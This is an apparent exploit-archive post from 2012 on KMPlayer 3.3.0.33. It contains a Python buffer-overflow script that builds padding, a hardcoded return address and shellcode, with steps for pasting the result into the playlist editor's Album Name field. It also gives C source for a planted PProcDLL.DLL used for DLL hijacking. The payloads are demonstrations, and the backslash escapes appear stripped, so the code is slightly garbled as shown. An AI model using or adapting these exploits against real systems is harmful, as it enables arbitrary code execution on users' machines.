[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KMPlayer v3.3.0.33 Multiple Vulnerabilities
# Published : 2012-11-04
# Author :
# Previous Title : Novell Groupwise Internet Agent LDAP BIND Request Overflow Vulnerability
# Next Title : Sony PC Companion 2.1 (Load()) Stack-based Unicode Buffer Overflow
# Exploit Title: The KMPlayer v3.3.0.33 Multiple Vulnerabilities
# Date: October, 26, 2012
# Discovered By: Mr.XHat
# Exploit Author: Mr.XHat
# E-Mail: Mr.XHat {AT} Gmail.com
# Vendor: http://www.kmplayer.com/
# Version: 3.3.0.33
# Tested On: WinXP SP3 EN
#########################
# Buffer Overflow Vulnerability:
junk = "x41" * 250
eip = "xD7x30x9Dx7C"
shellcode = (
"x31xC9x51x68x63x61x6Cx63"
"x54xB8xC7x93xC2x77xFFxD0"
)
exploit = junk + eip + shellcode
file = open("Exploit.txt", "w")
file.write(exploit)
file.close()
# How To Do Exploit:
# First Run The KMPlayer And Get To Playlist > Playlist Editor... > Add New album Then Past Exploit Code To "Album Name:", Now Your Shellcode Will Executed!
############################################################################################################################################################
# DLL Hijacking Vulnerability:
# DLL Name: PProcDLL.DLL
# How To Do Hijack:
First Compile Below Source Code With C Compiler(s) And Rename Compiled DLL To PProcDLL.DLL Then Copy It To The KMPlayer Installed Path, Now If You Run The KMPlayer DLL Will Hijacked!
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_hijack();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacked!", "Mr.XHat", MB_OK);
}
#
# Enjoys!